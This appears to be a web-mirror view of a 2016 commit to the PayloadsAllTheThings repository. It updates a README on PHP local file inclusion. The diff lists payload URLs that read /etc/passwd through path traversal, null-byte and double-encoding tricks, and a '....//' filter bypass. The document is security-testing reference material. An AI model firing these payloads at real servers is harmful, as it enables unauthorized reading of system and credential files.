weyne/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/weyne85/PayloadsAllTheThings.git synced 2025-10-29 16:57:02 +00:00
Code Issues Packages Projects Releases Wiki Activity

Methodology added, XSS payloads updated,little fix

Browse Source
This commit is contained in:
swisskyrepo
2016-11-06 12:42:50 +07:00
parent 22e8dc091f
commit 54bf6d9a5b
10 changed files with 149 additions and 32 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
PHP include/README.md
View File

@@ -3,12 +3,13 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
## Exploit
Basic LFI (null byte and double encoding)
Basic LFI (null byte, double encoding and other tricks)
```
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
```
LFI Wrapper rot13 and base64 - php://filter case insensitive